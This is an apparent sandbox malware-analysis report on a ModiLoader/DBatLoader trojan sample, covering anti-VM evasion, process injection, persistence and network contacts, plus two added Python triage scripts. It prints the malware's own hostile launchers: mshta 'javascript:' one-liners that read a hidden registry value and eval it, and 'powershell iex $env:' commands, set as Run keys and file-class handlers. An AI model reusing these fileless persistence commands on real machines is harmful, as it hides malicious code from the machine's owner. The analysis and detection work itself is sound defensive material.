Malware Analysis Report

2024-10-19 07:03

Sample ID 240508-aezezafh2y
Target 2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118
SHA256 a55eceaf61aec51a64be7f8b9b2db0d7309b197dd9811378a619185b8887e25e
Tags

modiloader evasion persistence trojan

Score

10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score

10/10

SHA256

a55eceaf61aec51a64be7f8b9b2db0d7309b197dd9811378a619185b8887e25e

Threat Level: Known bad

The file 2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

ModiLoader Second Stage

Looks for VMWare Tools registry key

Checks BIOS information in registry

Checks computer location settings

Drops startup file

Deletes itself

Maps connected drives based on registry

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-08 00:08

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-08 00:08

Reported

2024-05-08 00:10

Platform

win7-20240221-en

Max time kernel

134s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (60 identical rows; the sandbox recorded no indicator, process or target for this signature)

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:Cjmw05o=\"IQ\";Dg9=new%20ActiveXObject(\"WScript.Shell\");tqY42R=\"DHLKt9sK\";ox1Fz=Dg9.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\pzadcohmp\\\\jhpvhyp\");m9Rzdob1=\"DJ5\";eval(ox1Fz);fKF6f=\"vkzEA\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:eazhd5X=\"LXg0\";l9F5=new%20ActiveXObject(\"WScript.Shell\");A0Dux2=\"HWuqf1o\";Yre4U=l9F5.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");Tlv3u4whx=\"9KdzotCP\";eval(Yre4U);lStG04bDw=\"W8rX\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d3afae00\\9a86c6c3.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8\ = "379d11eb" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:kFMJ49z=\"1W\";wj61=new ActiveXObject(\"WScript.Shell\");mriRa8yE=\"D5fq2Zc\";Hr0ti=wj61.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");hCn18dbA=\"ZWe35\";eval(Hr0ti);apXv4X1L=\"3CQ\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8 C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (4 identical rows)
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A (60 identical rows)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe (11 identical rows)
PID 2596 wrote to memory of 2740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (4 identical rows)
PID 2740 wrote to memory of 2508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe (8 identical rows)
PID 2508 wrote to memory of 1032 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe (8 identical rows)
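The table above lists one row per WriteProcessMemory call, and what matters for triage is the shape of the chain rather than the raw count. The Python below is an added example, not part of the sandbox's output: it parses rows in the table's own format, collapses the repeats into per-edge counts, and walks writer-to-target edges from each root. The ROWS list is constructed from this table with the repeats kept so the counts are real; the same-image / cross-image labelling is this example's heuristic, not a sandbox verdict.

```python
"""Rebuild the injection chain from the sandbox's WriteProcessMemory rows.

Added example, not part of the sandbox output. ROWS is constructed from this
report's behavioral1 'Suspicious use of WriteProcessMemory' table, each row
repeated as often as it appears there.
"""
import ntpath
import re
from collections import Counter, defaultdict

ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

EXE = r"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"
MSHTA = r"C:\Windows\system32\mshta.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
REGSVR = r"C:\Windows\SysWOW64\regsvr32.exe"

# Constructed from the report's table: 11 + 4 + 8 + 8 rows.
ROWS = (
    [f"PID 2220 wrote to memory of 2332 N/A {EXE} {EXE}"] * 11
    + [f"PID 2596 wrote to memory of 2740 N/A {MSHTA} {PS}"] * 4
    + [f"PID 2740 wrote to memory of 2508 N/A {PS} {REGSVR}"] * 8
    + [f"PID 2508 wrote to memory of 1032 N/A {REGSVR} {REGSVR}"] * 8
)


def parse_rows(rows):
    """Return ({(writer_pid, target_pid): write_count}, {pid: image_path})."""
    counts, images = Counter(), {}
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue  # not a WriteProcessMemory row; ignore
        w, t, w_img, t_img = m.groups()
        counts[(int(w), int(t))] += 1
        images[int(w)], images[int(t)] = w_img, t_img
    return counts, images


def chains(counts):
    """Walk writer -> target edges from every root (a PID that nobody wrote into)."""
    children = defaultdict(list)
    for w, t in counts:
        children[w].append(t)
    roots = sorted({w for w, _ in counts} - {t for _, t in counts})
    paths = []

    def walk(pid, path):
        path = path + [pid]
        if not children[pid]:
            paths.append(path)
        for child in sorted(children[pid]):
            walk(child, path)

    for root in roots:
        walk(root, [])
    return paths


def describe(chain, counts, images):
    """Label each hop. A write into a fresh copy of the writer's own image is the
    process-hollowing shape (this report also flags SetThreadContext on the
    sample); a write into a different image is a hand-off into a new host."""
    hops = []
    for w, t in zip(chain, chain[1:]):
        shape = "same-image" if images[w] == images[t] else "cross-image"
        hops.append((w, t, counts[(w, t)], shape))
    return hops


if __name__ == "__main__":
    counts, images = parse_rows(ROWS)
    for chain in chains(counts):
        for w, t, n, shape in describe(chain, counts, images):
            print(f"{w} ({ntpath.basename(images[w])}) -> {t} "
                  f"({ntpath.basename(images[t])}): {n} writes, {shape}")
```

Two roots come out of this table: 2220 writes into a second copy of itself (2332), the hollowing shape, and the mshta.exe process 2596, whose parent the report records as wmiprvse.exe rather than the sample, starts a separate chain into powershell.exe, regsvr32.exe and a second regsvr32.exe. The gap between 2332 and 2596 is the WMI launch, which no memory write records, so a chain built from injection events alone will always show it as a break.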

Processes

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:jQ5EYzc="4TMLuba";h72s=new%20ActiveXObject("WScript.Shell");hUi0XB0j="dWq4a3v";w50sTa=h72s.RegRead("HKLM\\software\\Wow6432Node\\BDoThICmlp\\FmdJLBt");F7uYBHoD="IeuF";eval(w50sTa);by3c0WEzU="rqWRw";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:aojxef

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"
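The autostart entries in this report (the Run values under "Adds Run key to start application", the `.73caeeca8` class handler under "Modifies registry class", and the mshta.exe and powershell.exe command lines in the process list above) share one trick: no script is left on disk. mshta.exe is started with an inline javascript: URI that calls RegRead() on an attacker-chosen key and eval()s whatever comes back, and the PowerShell stage is run with `iex $env:aojxef`, i.e. from an environment variable. The Python below is an added triage example, not part of the sandbox's output or its signature logic: it takes those values (constructed here as they are stored on disk, with the export's JSON escaping removed), flags each launcher shape, resolves the extension-to-ProgID-to-command chain, and extracts the registry key that holds the second stage so an analyst knows where to pull it from. The classification names and regular expressions are this example's own.

```python
"""Triage helper for the registry-resident launchers in this report.

Added example, not part of the sandbox output. Sample inputs are the report's
own Run-key values, class-handler values and process command lines, written
as stored on disk. The detection heuristics are this example's, not the
sandbox's signature logic.
"""
import re
from typing import Optional

# mshta.exe started with an inline javascript: URI ("javascript:" may itself be quoted)
MSHTA_JS_RE = re.compile(r'(?i)mshta(?:\.exe)?"?\s+"?javascript:')
# var = obj.RegRead("<key literal>")  (the JS literal still carries doubled backslashes)
REGREAD_RE = re.compile(r'(\w+)\s*=\s*\w+\.RegRead\(\s*"([^"]+)"\s*\)')
# powershell ... iex $env:NAME  (script body staged in an environment variable)
IEX_ENV_RE = re.compile(r"(?i)\biex\s+\$env:(\w+)")


def js_literal_to_path(lit: str) -> str:
    r"""Undo JavaScript string escaping: "HKLM\\a\\b" in source is HKLM\a\b at runtime."""
    return lit.replace("\\\\", "\\")


def classify(cmd: str) -> dict:
    """Describe what a Run value / command line does; empty dict if nothing matched."""
    if MSHTA_JS_RE.search(cmd):
        m = REGREAD_RE.search(cmd)
        # Only call it a stager when the value read from the registry is what gets eval()ed.
        if m and re.search(r"\beval\(\s*%s\s*\)" % re.escape(m.group(1)), cmd):
            return {"kind": "mshta-regread-eval", "payload_key": js_literal_to_path(m.group(2))}
        return {"kind": "mshta-javascript"}
    m = IEX_ENV_RE.search(cmd)
    if m and re.search(r"(?i)powershell", cmd):
        return {"kind": "powershell-iex-env", "env_var": m.group(1)}
    path = cmd.strip().strip('"')
    if path.lower().endswith(".lnk"):
        return {"kind": "lnk-launcher", "path": path}
    return {}


def resolve_extension(ext: str, classes: dict) -> Optional[str]:
    r"""Follow <ext> -> ProgID -> <ProgID>\shell\open\command, the chain the
    'Modifies registry class' events build under HKCU\Software\Classes.
    `classes` maps a key path (relative to Classes) to its default value."""
    progid = classes.get(ext)
    if not progid:
        return None
    return classes.get(progid + r"\shell\open\command")


def triage(run_values, classes):
    """Return (source, finding) pairs for every autostart entry that matched."""
    findings = [("Run", c) for c in map(classify, run_values) if c]
    for ext in (k for k in classes if k.startswith(".")):
        cmd = resolve_extension(ext, classes)
        c = classify(cmd) if cmd else {}
        if c:
            c["extension"] = ext
            findings.append(("Classes", c))
    return findings


# Constructed from the report's 'Adds Run key to start application' rows and the
# behavioral1 process list.
RUN_VALUES = [
    r'"C:\Windows\system32\mshta.exe" javascript:Cjmw05o="IQ";Dg9=new%20ActiveXObject("WScript.Shell");tqY42R="DHLKt9sK";ox1Fz=Dg9.RegRead("HKLM\\software\\Wow6432Node\\pzadcohmp\\jhpvhyp");m9Rzdob1="DJ5";eval(ox1Fz);fKF6f="vkzEA";',
    r'"C:\Users\Admin\AppData\Local\d3afae00\9a86c6c3.lnk"',
    r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:aojxef',
]
# Constructed from the 'Modifies registry class' rows, relative to HKCU\Software\Classes.
CLASSES = {
    ".73caeeca8": "379d11eb",
    r"379d11eb\shell\open\command": r'"C:\Windows\system32\mshta.exe" "javascript:kFMJ49z="1W";wj61=new ActiveXObject("WScript.Shell");mriRa8yE="D5fq2Zc";Hr0ti=wj61.RegRead("HKCU\\software\\pzadcohmp\\jhpvhyp");hCn18dbA="ZWe35";eval(Hr0ti);apXv4X1L="3CQ";"',
}

if __name__ == "__main__":
    for source, finding in triage(RUN_VALUES, CLASSES):
        print(source, finding)
```

The key names differ between the persisted Run value (pzadcohmp\jhpvhyp), the first-run mshta command line above (BDoThICmlp\FmdJLBt) and the behavioral2 run (TsKfzBlpfX\sJd7ke, with `iex $env:zoaiio`), so a hunt should match on the shape (mshta + javascript: + RegRead + eval, or powershell + iex + $env:) rather than on any of these names. The HKLM key is spelled out with Wow6432Node because the 32-bit regsvr32.exe that wrote it was redirected there, while the 64-bit mshta.exe in system32 that reads it back is not.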

Network

Country Destination Domain Proto
US 67.176.157.250:80 tcp
IT 109.70.205.61:80 tcp
DE 158.226.30.255:80 tcp
AU 210.215.185.117:80 tcp
IT 88.32.128.249:80 tcp
NZ 121.99.36.23:80 tcp
JP 133.200.57.76:80 tcp
US 16.35.11.120:80 tcp
BR 138.120.252.131:80 tcp
US 131.9.16.176:80 tcp
US 76.150.211.188:80 tcp
US 151.190.172.117:80 tcp
US 141.104.240.2:8080 tcp
PL 83.17.16.208:80 tcp
US 148.52.104.16:80 tcp
US 206.83.155.177:80 tcp
FR 93.17.111.41:80 tcp
US 162.18.183.85:80 tcp
CN 59.71.187.66:80 tcp
N/A 100.101.140.95:80 tcp
JP 61.203.245.157:80 tcp
US 153.39.129.185:80 tcp
US 131.91.33.170:80 tcp
BR 179.226.116.42:80 tcp
US 65.207.116.105:80 tcp
US 72.174.123.112:80 tcp
JP 36.240.195.53:80 tcp
AU 220.235.72.193:80 tcp
US 68.142.124.147:80 tcp
US 168.21.28.187:80 tcp
IR 94.176.12.237:80 tcp
US 71.239.109.123:80 tcp
US 7.126.254.249:80 tcp
JP 60.81.142.237:80 tcp
US 171.70.216.153:80 tcp
HK 18.167.127.14:8080 tcp
RU 87.248.238.149:80 tcp
TH 122.154.201.162:80 tcp
BR 189.74.142.6:80 tcp
KR 114.207.80.72:80 tcp
US 44.3.104.217:80 tcp
US 150.177.199.161:443 tcp
US 55.234.181.239:80 tcp
ZA 105.254.29.93:80 tcp
CN 60.215.32.120:80 tcp
DE 53.234.56.239:80 tcp
US 159.172.153.44:80 tcp
US 44.182.43.90:8080 tcp
BE 143.169.10.174:80 tcp
KR 218.156.114.126:8080 tcp
TN 197.13.154.39:80 tcp
US 48.123.3.15:80 tcp
N/A 10.41.202.179:80 tcp
AU 115.187.224.68:8080 tcp
CN 120.91.46.216:80 tcp
US 75.116.26.60:80 tcp
SG 43.84.194.95:8080 tcp
US 166.171.15.94:80 tcp
KR 39.118.16.233:80 tcp
DE 95.33.192.98:80 tcp
US 35.22.78.106:80 tcp
CN 1.29.8.113:80 tcp
HK 154.23.81.74:80 tcp
HK 154.23.81.74:80 154.23.81.74 tcp
DE 98.67.234.52:443 tcp
JP 61.45.124.82:80 tcp
GB 156.61.196.243:80 tcp
DE 82.96.124.192:80 tcp
MY 60.48.52.121:80 tcp
MA 105.69.150.128:80 tcp
JP 150.33.34.220:80 tcp
CN 121.226.213.168:443 tcp
CH 153.109.114.226:80 tcp
TW 42.77.82.254:443 tcp
US 18.206.163.243:80 tcp
US 99.60.70.52:80 tcp
US 162.213.172.75:80 tcp
US 12.111.75.101:80 tcp
CN 219.219.45.51:80 tcp
JP 175.104.75.251:443 tcp
US 18.114.37.42:80 tcp
AU 120.20.229.149:80 tcp
GE 5.178.168.212:80 tcp
US 192.56.100.55:80 tcp
US 205.2.98.126:80 tcp
PL 217.96.141.27:80 tcp
US 15.28.202.26:80 tcp
NO 45.153.105.3:443 tcp
CN 110.106.233.71:80 tcp
NG 105.115.45.24:80 tcp
PK 103.137.27.12:80 tcp
MY 42.155.31.234:80 tcp
US 67.37.221.221:80 tcp
IE 52.51.45.46:80 tcp
JP 160.14.178.79:443 tcp
US 7.72.78.163:443 tcp
IT 151.36.227.107:80 tcp
US 70.8.55.209:8080 tcp
US 172.168.38.168:80 tcp
US 129.25.147.43:80 tcp
US 52.165.189.218:80 tcp
US 38.161.90.42:80 tcp
RU 84.204.73.60:80 tcp
US 98.149.48.138:80 tcp
CN 1.87.121.238:80 tcp
RO 86.34.233.64:80 tcp
CN 43.142.27.75:80 tcp
US 68.193.130.145:80 tcp
US 132.106.207.44:8080 tcp
US 3.228.173.223:80 tcp
US 30.207.22.243:80 tcp
DE 51.23.228.35:80 tcp
RU 89.20.62.164:80 tcp
TN 102.174.225.234:80 tcp
GB 20.117.45.233:80 tcp
US 192.193.53.64:80 tcp
US 99.137.27.19:80 tcp
US 55.219.143.165:80 tcp
US 108.73.88.191:80 tcp
US 11.244.18.177:80 tcp
US 146.15.54.13:80 tcp
NO 178.20.105.42:80 tcp
US 9.75.249.1:80 tcp
LT 158.129.3.164:80 tcp
US 12.241.51.178:80 tcp
DE 37.83.178.249:80 tcp
US 22.73.169.70:80 tcp
DE 194.175.235.74:80 tcp
MA 197.146.80.40:80 tcp
N/A 127.226.253.247:80 tcp
VN 113.174.145.28:80 tcp
JP 124.102.46.64:80 tcp
IT 151.76.163.91:80 tcp
FR 147.250.197.194:8080 tcp
US 143.20.109.199:80 tcp
US 170.227.218.204:80 tcp
RU 195.58.36.225:443 tcp
DE 217.229.233.110:80 tcp
US 17.15.93.242:80 tcp
JP 133.146.242.190:80 tcp
AU 140.159.183.192:80 tcp
SK 95.103.191.53:80 tcp
US 44.122.147.155:8080 tcp
US 166.159.46.26:80 tcp
GB 81.174.195.239:80 tcp

Files

memory/2332-{2,4,5}-0x0000000000400000-0x000000000043A000-memory.dmp (3 snapshots of the same region)

memory/2332-{6..12}-0x0000000001D80000-0x0000000001E56000-memory.dmp (7 snapshots of the same region)

memory/2740-{21,26}-0x00000000061B0000-0x0000000006286000-memory.dmp (2 snapshots of the same region)

memory/2508-{23,25,27..49,54..58,60,66}-0x0000000000110000-0x0000000000251000-memory.dmp (32 snapshots of the same region)

memory/1032-{67..82}-0x0000000000130000-0x0000000000271000-memory.dmp (16 snapshots of the same region)

C:\Users\Admin\AppData\Local\d3afae00\d2239679.bat

MD5 f2ae417dcfcbe11a00d1102e6b587247
SHA1 0078bd4798af0b8a717425f1a85a1ff2a70c4c37
SHA256 0dc66bcd192c0da909958e43407fb9c4eb212c0471e715e32555f9399549255b
SHA512 8fd8d7af58ce744f505ec537830104bab71f86e87f7184bb6f0b699c8eed5f68ffd97211c435771b76aae94c8a74f782b656923c0f61f7189349b744d76f7dea

C:\Users\Admin\AppData\Roaming\e00a3efa\fe73a489.73caeeca8

MD5 e29d50165298aecb6e2acbadbce59342
SHA1 7904d2cce229b247ba13be33b1a7084516d5a8d1
SHA256 e498e261aa1a33bad74c37a65510381f011f35e3c70043345551dad676cc5524
SHA512 1a4de70ac3358bcdbe586e222037f18878aaf5ee495baeb04a1f4d44fa451f22ecbb5119a11a85c0a497265f12e961b62254ccd6ad04869778edee2714fd8689

C:\Users\Admin\AppData\Local\d3afae00\9a86c6c3.lnk

MD5 a92483561521734b6623cef20732fdd1
SHA1 04383522970e97d293cf512703c8f52b651b4034
SHA256 14fe397ec720047267c23536cb6cc73b911a54e1b09104a02e7f0dc0b5fbf8b7
SHA512 977e25381bf6c39334ffd9a21822168182a8d6d0357a70ab4f50ff8785bd9da9ff227e4cf240e55612faa0505a8061a8c165ea8afda8c1603d39150e1343bed8

C:\Users\Admin\AppData\Local\d3afae00\52d5d4d8.73caeeca8

MD5 2cacf5a4cfed3732b79f7ff60ae1e37c
SHA1 28d05477d8c337f3e8059b5a113038ed507c5543
SHA256 5685cbf2872de3a99bc488227def0e3ce23b213a4f69451c441fd7a6e24a2b3f
SHA512 da92f062f8cb4a1e1818e88d28446f79994cb797ece68f969917ed0fd223c3a7aaad50d4b175a9ad45dfc871ab62c448ce4f64a4a1c3e1a0105597b4c4c9160d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk

MD5 659f6c112b2f013e65491750969c0d01
SHA1 0335851b16792bfee657c1bf618b68d4161c35d3
SHA256 d81ea0121701e02daf3c4c8a33272ea0570aa38d838aa5bc1df21dd2e745353b
SHA512 b09d3c14d27b771b3c831c1fe7d321c08ea0864a42a6fa300000ea41331c0acd6bc8659865d173022a89f25f7c4defdadd48e28916ed4229b2a244b3b4701042

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-08 00:08

Reported

2024-05-08 00:10

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (10 identical rows; the sandbox recorded no indicator, process or target for this signature)

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe (10 identical rows)
PID 116 wrote to memory of 804 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:ie9ROFH="MZmmo87";e2E7=new%20ActiveXObject("WScript.Shell");f4Afp="E";wh7im7=e2E7.RegRead("HKLM\\software\\Wow6432Node\\TsKfzBlpfX\\sJd7ke");ZX5iHe="MjLUmqKj";eval(wh7im7);O9rFdG6="B3AArkQF";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:zoaiio

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

